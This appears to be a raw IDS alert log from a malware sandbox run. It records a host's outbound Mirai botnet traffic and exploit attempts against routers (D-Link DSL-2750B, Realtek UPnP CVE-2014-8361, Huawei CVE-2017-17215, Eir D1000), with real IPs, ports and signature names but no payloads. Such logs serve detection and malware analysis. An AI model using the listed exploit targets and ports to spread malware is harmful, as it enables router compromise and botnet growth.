                            192.168.2.2370.62.230.25443020802835221 10/23/22-17:57:38.477263TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)4302080192.168.2.2370.62.230.254
                            192.168.2.23122.228.200.11355508528692027339 10/23/22-17:57:14.125728TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5550852869192.168.2.23122.228.200.113
                            192.168.2.2389.34.101.12544744528692027339 10/23/22-17:58:32.710280TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4474452869192.168.2.2389.34.101.125
                            192.168.2.2395.101.105.3132814802027121 10/23/22-17:57:40.667718TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3281480192.168.2.2395.101.105.31
                            192.168.2.2395.80.200.21038398802027121 10/23/22-17:58:15.223435TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3839880192.168.2.2395.80.200.210
                            192.168.2.23112.118.111.18436898802027121 10/23/22-17:57:31.191166TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3689880192.168.2.23112.118.111.184
                            192.168.2.2385.214.95.17742752802846457 10/23/22-17:58:01.316273TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4275280192.168.2.2385.214.95.177
                            192.168.2.2382.78.31.20632818802846380 10/23/22-17:57:07.329941TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3281880192.168.2.2382.78.31.206
                            192.168.2.2352.194.164.20645512802841623 10/23/22-17:57:07.686714TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4551280192.168.2.2352.194.164.206
                            192.168.2.23154.213.156.16046204802841623 10/23/22-17:57:44.512769TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4620480192.168.2.23154.213.156.160
                            192.168.2.2380.237.207.24536402802846457 10/23/22-17:56:52.704370TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3640280192.168.2.2380.237.207.245
                            192.168.2.2395.223.43.23833270802027121 10/23/22-17:58:27.442268TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3327080192.168.2.2395.223.43.238
                            192.168.2.23178.57.217.12436848802846380 10/23/22-17:57:49.327759TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3684880192.168.2.23178.57.217.124
                            192.168.2.2386.73.254.21857834802846380 10/23/22-17:57:03.498319TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5783480192.168.2.2386.73.254.218
                            192.168.2.23181.52.121.1444068802846380 10/23/22-17:57:10.948665TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4406880192.168.2.23181.52.121.14
                            192.168.2.23213.76.131.10534622802846380 10/23/22-17:57:24.960930TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3462280192.168.2.23213.76.131.105
                            192.168.2.23200.90.104.16147350802846380 10/23/22-17:58:09.651122TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4735080192.168.2.23200.90.104.161
                            192.168.2.2318.185.14.12156320802841623 10/23/22-17:56:59.044847TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5632080192.168.2.2318.185.14.121
                            192.168.2.23188.128.226.3152330802846457 10/23/22-17:57:47.812263TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5233080192.168.2.23188.128.226.31
                            192.168.2.2389.23.255.7846894802846457 10/23/22-17:57:07.080876TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4689480192.168.2.2389.23.255.78
                            192.168.2.2380.248.211.552232802846380 10/23/22-17:57:11.369396TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5223280192.168.2.2380.248.211.5
                            192.168.2.23164.92.188.23037294802846457 10/23/22-17:58:34.368348TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3729480192.168.2.23164.92.188.230
                            192.168.2.2388.221.150.17951246802027121 10/23/22-17:57:59.939067TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5124680192.168.2.2388.221.150.179
                            192.168.2.232.16.181.16937080802846457 10/23/22-17:57:28.752685TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3708080192.168.2.232.16.181.169
                            192.168.2.235.45.66.11534348802846457 10/23/22-17:57:35.597475TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3434880192.168.2.235.45.66.115
                            192.168.2.23186.78.174.7339924802835221 10/23/22-17:58:29.701765TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)3992480192.168.2.23186.78.174.73
                            192.168.2.2382.124.15.24849894802846380 10/23/22-17:57:54.139204TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4989480192.168.2.2382.124.15.248
                            192.168.2.23213.182.68.20157730802846380 10/23/22-17:57:03.553360TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5773080192.168.2.23213.182.68.201
                            192.168.2.2388.133.227.16453244802027121 10/23/22-17:57:18.661578TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5324480192.168.2.2388.133.227.164
                            192.168.2.23171.1.89.12945514802846457 10/23/22-17:58:21.641440TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4551480192.168.2.23171.1.89.129
                            192.168.2.23104.103.111.21952660802841623 10/23/22-17:58:06.256188TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5266080192.168.2.23104.103.111.219
                            192.168.2.23213.55.174.19148554802846380 10/23/22-17:57:03.512340TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4855480192.168.2.23213.55.174.191
                            192.168.2.2380.112.100.7657610802846457 10/23/22-17:56:52.717306TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5761080192.168.2.2380.112.100.76
                            192.168.2.23178.135.102.12243920802846380 10/23/22-17:57:49.358932TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4392080192.168.2.23178.135.102.122
                            192.168.2.23195.20.41.5336014802846457 10/23/22-17:58:21.665745TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3601480192.168.2.23195.20.41.53
                            192.168.2.2395.101.146.24736554802027121 10/23/22-17:57:33.443735TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3655480192.168.2.2395.101.146.247
                            192.168.2.2337.72.203.3554426528692027339 10/23/22-17:58:30.539666TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5442652869192.168.2.2337.72.203.35
                            192.168.2.23169.148.66.8138822802846380 10/23/22-17:58:30.924119TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3882280192.168.2.23169.148.66.81
                            192.168.2.23178.32.58.11139354802846380 10/23/22-17:58:27.257371TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3935480192.168.2.23178.32.58.111
                            192.168.2.232.55.105.11544930802846457 10/23/22-17:57:07.202183TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4493080192.168.2.232.55.105.115
                            192.168.2.23122.236.227.17438636528692027339 10/23/22-17:58:14.781469TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3863652869192.168.2.23122.236.227.174
                            192.168.2.2384.252.102.16047992802846457 10/23/22-17:58:33.323703TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4799280192.168.2.2384.252.102.160
                            192.168.2.232.132.135.7753470802846457 10/23/22-17:57:03.490780TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5347080192.168.2.232.132.135.77
                            192.168.2.23200.61.47.20332828802846380 10/23/22-17:57:18.808202TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3282880192.168.2.23200.61.47.203
                            192.168.2.2388.99.193.10940040802027121 10/23/22-17:57:49.334871TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4004080192.168.2.2388.99.193.109
                            192.168.2.23112.167.1.3160102802027121 10/23/22-17:56:58.131054TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6010280192.168.2.23112.167.1.31
                            192.168.2.23178.62.10.5247822802846380 10/23/22-17:57:55.412772TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4782280192.168.2.23178.62.10.52
                            192.168.2.23156.251.133.17635036802841623 10/23/22-17:58:18.782861TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3503680192.168.2.23156.251.133.176
                            192.168.2.2323.33.171.14857632802835222 10/23/22-17:57:40.325812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5763280192.168.2.2323.33.171.148
                            192.168.2.23206.189.127.1054244802846380 10/23/22-17:57:18.559033TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5424480192.168.2.23206.189.127.10
                            192.168.2.2383.61.8.23760948802846380 10/23/22-17:58:19.895356TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6094880192.168.2.2383.61.8.237
                            192.168.2.2389.223.4.1852418802846457 10/23/22-17:58:10.420211TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5241880192.168.2.2389.223.4.18
                            192.168.2.23200.55.134.17442224802846380 10/23/22-17:56:55.302550TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4222480192.168.2.23200.55.134.174
                            192.168.2.2337.252.74.9347202802846457 10/23/22-17:57:07.197733TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4720280192.168.2.2337.252.74.93
                            192.168.2.23188.213.33.19145434802846457 10/23/22-17:58:07.936248TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4543480192.168.2.23188.213.33.191
                            192.168.2.2395.86.69.7040030802027121 10/23/22-17:57:54.677600TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4003080192.168.2.2395.86.69.70
                            192.168.2.23200.6.99.16338428802846380 10/23/22-17:58:17.015300TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3842880192.168.2.23200.6.99.163
                            192.168.2.2388.221.250.10148572802027121 10/23/22-17:58:05.326044TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4857280192.168.2.2388.221.250.101
                            192.168.2.23185.10.158.2156654802841623 10/23/22-17:56:51.489662TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5665480192.168.2.23185.10.158.21
                            192.168.2.2395.110.227.6448552802027121 10/23/22-17:56:55.620612TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4855280192.168.2.2395.110.227.64
                            192.168.2.2395.88.152.12037786802027121 10/23/22-17:56:53.158120TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3778680192.168.2.2395.88.152.120
                            192.168.2.23195.164.254.22945374528692027339 10/23/22-17:58:30.527981TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4537452869192.168.2.23195.164.254.229
                            192.168.2.2323.40.26.22344698802841623 10/23/22-17:57:12.938656TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4469880192.168.2.2323.40.26.223
                            192.168.2.2384.16.247.6956900802846457 10/23/22-17:57:46.246485TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5690080192.168.2.2384.16.247.69
                            192.168.2.2389.40.35.6046174802846457 10/23/22-17:57:07.197807TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4617480192.168.2.2389.40.35.60
                            192.168.2.23197.25.212.3157758802835221 10/23/22-17:57:11.163825TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)5775880192.168.2.23197.25.212.31
                            192.168.2.2354.230.110.18644904802835222 10/23/22-17:57:33.314706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4490480192.168.2.2354.230.110.186
                            192.168.2.23156.234.151.23938852802841623 10/23/22-17:58:29.254030TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3885280192.168.2.23156.234.151.239
                            192.168.2.23188.166.243.18654270802846457 10/23/22-17:57:00.491512TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5427080192.168.2.23188.166.243.186
                            192.168.2.23213.14.255.22459990802846380 10/23/22-17:57:24.977401TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5999080192.168.2.23213.14.255.224
                            192.168.2.23112.162.214.6154798802027121 10/23/22-17:57:36.301164TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5479880192.168.2.23112.162.214.61
                            192.168.2.2386.94.8.10550242802846380 10/23/22-17:57:33.283591TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5024280192.168.2.2386.94.8.105
                            192.168.2.23178.210.71.12038890802846380 10/23/22-17:58:27.300687TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3889080192.168.2.23178.210.71.120
                            192.168.2.2382.165.74.1949028802846380 10/23/22-17:57:46.287055TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4902880192.168.2.2382.165.74.19
                            192.168.2.23156.241.95.12437092802841623 10/23/22-17:58:37.928792TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3709280192.168.2.23156.241.95.124
                            192.168.2.23213.250.35.12441982802846380 10/23/22-17:56:58.160862TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4198280192.168.2.23213.250.35.124
                            192.168.2.23156.240.110.20937950372152835222 10/23/22-17:58:28.949107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3795037215192.168.2.23156.240.110.209
                            192.168.2.2395.89.118.15855294802027121 10/23/22-17:57:56.443829TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5529480192.168.2.2395.89.118.158
                            192.168.2.2395.244.214.14857008802027121 10/23/22-17:56:53.180020TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5700880192.168.2.2395.244.214.148
                            192.168.2.2337.59.182.22844582802846457 10/23/22-17:57:31.274748TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4458280192.168.2.2337.59.182.228
                            192.168.2.2354.145.127.17257618802841623 10/23/22-17:58:14.489760TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5761880192.168.2.2354.145.127.172
                            192.168.2.23188.225.62.12451002802846457 10/23/22-17:57:47.833690TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5100280192.168.2.23188.225.62.124
                            192.168.2.2382.180.171.16433066802846380 10/23/22-17:58:06.311768TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3306680192.168.2.2382.180.171.164
                            192.168.2.23206.72.5.24939794802846380 10/23/22-17:57:18.656565TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3979480192.168.2.23206.72.5.249
                            192.168.2.2395.56.132.6240336802027121 10/23/22-17:57:45.060050TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4033680192.168.2.2395.56.132.62
                            192.168.2.2395.155.211.18649866802027121 10/23/22-17:58:07.336838TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4986680192.168.2.2395.155.211.186
                            192.168.2.2395.86.94.25544218802027121 10/23/22-17:57:38.707261TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4421880192.168.2.2395.86.94.255
                            192.168.2.23213.152.85.15535622802846380 10/23/22-17:57:18.657475TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3562280192.168.2.23213.152.85.155
                            192.168.2.23178.32.61.5133928802846380 10/23/22-17:56:49.720674TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3392880192.168.2.23178.32.61.51
                            192.168.2.2385.128.204.8339382802846457 10/23/22-17:57:58.562315TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3938280192.168.2.2385.128.204.83
                            192.168.2.2395.86.78.15153844802027121 10/23/22-17:58:30.397264TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5384480192.168.2.2395.86.78.151
                            192.168.2.23181.41.202.8635206802846380 10/23/22-17:57:10.953928TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3520680192.168.2.23181.41.202.86
                            192.168.2.2389.35.48.22951988802846457 10/23/22-17:57:38.013530TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5198880192.168.2.2389.35.48.229
                            192.168.2.23156.247.23.883563075472023548 10/23/22-17:58:02.112528TCP2023548ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE356307547192.168.2.23156.247.23.88
                            192.168.2.23156.241.118.18549012802835221 10/23/22-17:57:38.912493TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)4901280192.168.2.23156.241.118.185
                            192.168.2.23112.169.156.954126802027121 10/23/22-17:58:36.316715TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5412680192.168.2.23112.169.156.9
                            192.168.2.2334.76.74.10445154802835221 10/23/22-17:56:47.921557TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)4515480192.168.2.2334.76.74.104
                            192.168.2.2395.238.101.21546354802027121 10/23/22-17:58:05.406457TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4635480192.168.2.2395.238.101.215
                            192.168.2.2395.9.41.15537402802027121 10/23/22-17:58:30.387777TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3740280192.168.2.2395.9.41.155
                            192.168.2.23181.193.9.1845328802846380 10/23/22-17:57:13.788226TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4532880192.168.2.23181.193.9.18
                            192.168.2.23112.74.115.13251736802027121 10/23/22-17:57:10.629643TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5173680192.168.2.23112.74.115.132
                            192.168.2.2383.239.86.18154786802846380 10/23/22-17:58:19.925560TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5478680192.168.2.2383.239.86.181
                            192.168.2.2341.225.51.14050464802835221 10/23/22-17:58:29.466955TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)5046480192.168.2.2341.225.51.140
                            192.168.2.2388.98.101.15960440802027121 10/23/22-17:57:01.063687TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6044080192.168.2.2388.98.101.159
                            192.168.2.23122.116.94.9237090802841623 10/23/22-17:57:28.658822TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3709080192.168.2.23122.116.94.92
                            192.168.2.2395.111.250.15860670802027121 10/23/22-17:57:49.311792TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6067080192.168.2.2395.111.250.158
                            192.168.2.23213.176.83.6157604802846380 10/23/22-17:57:25.070394TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5760480192.168.2.23213.176.83.61
                            192.168.2.2382.165.26.15335618802846380 10/23/22-17:57:07.288541TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3561880192.168.2.2382.165.26.153
                            192.168.2.23213.95.10.14644322802846380 10/23/22-17:57:37.887291TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4432280192.168.2.23213.95.10.146
                            192.168.2.23181.214.78.4754170802846380 10/23/22-17:56:55.632050TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5417080192.168.2.23181.214.78.47
                            192.168.2.2388.200.247.19333682802027121 10/23/22-17:58:05.284705TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3368280192.168.2.2388.200.247.193
                            192.168.2.23200.75.200.10259758802846380 10/23/22-17:58:09.114577TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5975880192.168.2.23200.75.200.102
                            192.168.2.23206.189.150.18458726802846380 10/23/22-17:57:00.053342TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5872680192.168.2.23206.189.150.184
                            192.168.2.2395.158.160.751674802027121 10/23/22-17:57:34.534739TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5167480192.168.2.2395.158.160.7
                            192.168.2.23213.151.37.534322802846380 10/23/22-17:57:58.356034TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3432280192.168.2.23213.151.37.5
                            192.168.2.23200.85.57.15856762802846380 10/23/22-17:58:09.811552TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5676280192.168.2.23200.85.57.158
                            192.168.2.23178.238.225.16148844802846380 10/23/22-17:58:27.248556TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4884480192.168.2.23178.238.225.161
                            192.168.2.2388.221.126.21253874802027121 10/23/22-17:58:02.115636TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5387480192.168.2.2388.221.126.212
                            192.168.2.23200.7.9.5555484802846380 10/23/22-17:58:22.290851TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5548480192.168.2.23200.7.9.55
                            192.168.2.2395.248.209.24548582802027121 10/23/22-17:57:25.854605TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4858280192.168.2.2395.248.209.245
                            192.168.2.2385.214.194.20333140802846457 10/23/22-17:57:31.240332TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3314080192.168.2.2385.214.194.203
                            192.168.2.2395.101.177.21939114802027121 10/23/22-17:58:24.017103TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3911480192.168.2.2395.101.177.219
                            192.168.2.23200.145.50.17451190802846380 10/23/22-17:57:14.980709TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5119080192.168.2.23200.145.50.174
                            192.168.2.23197.0.137.1375436075472023548 10/23/22-17:56:53.608732TCP2023548ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE543607547192.168.2.23197.0.137.137
                            192.168.2.23213.32.68.8936496802846380 10/23/22-17:58:33.195889TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3649680192.168.2.23213.32.68.89
                            192.168.2.23197.1.134.19957460372152835222 10/23/22-17:57:57.154835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5746037215192.168.2.23197.1.134.199
                            192.168.2.2388.219.3.14258788802027121 10/23/22-17:58:19.584441TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5878880192.168.2.2388.219.3.142
                            192.168.2.2389.21.223.20151174802846457 10/23/22-17:58:10.304546TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5117480192.168.2.2389.21.223.201
                            192.168.2.2395.208.230.5437526802027121 10/23/22-17:57:28.451752TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3752680192.168.2.2395.208.230.54
                            192.168.2.23188.158.91.12059320802846457 10/23/22-17:57:47.925030TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5932080192.168.2.23188.158.91.120
                            192.168.2.2361.42.57.19348056802846457 10/23/22-17:57:51.197183TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4805680192.168.2.2361.42.57.193
                            192.168.2.2395.216.37.8755274802027121 10/23/22-17:57:07.968046TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5527480192.168.2.2395.216.37.87
                            192.168.2.2388.221.59.6250114802027121 10/23/22-17:57:12.951910TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5011480192.168.2.2388.221.59.62
                            192.168.2.2395.67.46.21049302802027121 10/23/22-17:57:13.027539TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4930280192.168.2.2395.67.46.210
                            192.168.2.2385.236.156.1158694802846457 10/23/22-17:58:37.501669TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5869480192.168.2.2385.236.156.11
                            192.168.2.23190.192.207.545865275472023548 10/23/22-17:57:55.482280TCP2023548ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE586527547192.168.2.23190.192.207.54
                            192.168.2.2346.165.254.19641084802846457 10/23/22-17:57:41.256604TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4108480192.168.2.2346.165.254.196
                            192.168.2.23164.138.115.15240582528692027339 10/23/22-17:57:22.431427TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4058252869192.168.2.23164.138.115.152
                            192.168.2.23112.78.9.15551454802027121 10/23/22-17:58:02.812625TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5145480192.168.2.23112.78.9.155
                            192.168.2.2384.247.28.22844288802846457 10/23/22-17:57:12.961320TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4428880192.168.2.2384.247.28.228
                            192.168.2.23156.235.100.2034574372152835222 10/23/22-17:58:25.491294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3457437215192.168.2.23156.235.100.20
                            192.168.2.2370.62.230.25443020802841623 10/23/22-17:57:38.477263TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4302080192.168.2.2370.62.230.254
                            192.168.2.23178.91.57.13353534802846380 10/23/22-17:57:49.444577TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5353480192.168.2.23178.91.57.133
                            192.168.2.232.20.128.24645532802846457 10/23/22-17:57:28.759047TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4553280192.168.2.232.20.128.246
                            192.168.2.23188.190.16.11438428802846457 10/23/22-17:58:17.705299TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3842880192.168.2.23188.190.16.114
                            192.168.2.2388.151.74.557974802027121 10/23/22-17:58:32.661088TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5797480192.168.2.2388.151.74.5
                            192.168.2.235.135.201.18656190802846457 10/23/22-17:57:46.216250TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5619080192.168.2.235.135.201.186
                            192.168.2.2388.208.2.4834616802027121 10/23/22-17:57:06.711974TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3461680192.168.2.2388.208.2.48
                            192.168.2.23213.188.122.11736648802846380 10/23/22-17:56:42.722999TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3664880192.168.2.23213.188.122.117
                            192.168.2.23196.19.249.16953812802835222 10/23/22-17:58:16.933581TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5381280192.168.2.23196.19.249.169
                            192.168.2.2388.86.82.4552262802027121 10/23/22-17:58:07.304334TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5226280192.168.2.2388.86.82.45
                            192.168.2.23213.238.168.11450466802846380 10/23/22-17:58:00.630977TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5046680192.168.2.23213.238.168.114
                            192.168.2.23188.166.117.18433878802846457 10/23/22-17:58:17.659416TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3387880192.168.2.23188.166.117.184
                            192.168.2.2323.35.133.10237012802841623 10/23/22-17:56:56.766335TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3701280192.168.2.2323.35.133.102
                            192.168.2.2395.100.202.20056096802027121 10/23/22-17:57:28.450964TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5609680192.168.2.2395.100.202.200
                            192.168.2.23200.61.47.20333656802846380 10/23/22-17:57:30.241373TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3365680192.168.2.23200.61.47.203
                            192.168.2.23104.31.16.2645474802841623 10/23/22-17:57:50.366666TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4547480192.168.2.23104.31.16.26
                            192.168.2.2380.151.32.8549864802846457 10/23/22-17:56:48.706143TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4986480192.168.2.2380.151.32.85
                            192.168.2.23188.166.123.1049164802846457 10/23/22-17:58:07.917483TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4916480192.168.2.23188.166.123.10
                            192.168.2.23104.73.253.357436802841623 10/23/22-17:57:50.871792TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5743680192.168.2.23104.73.253.3
                            192.168.2.2384.42.150.24234768802846457 10/23/22-17:57:56.402207TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3476880192.168.2.2384.42.150.242
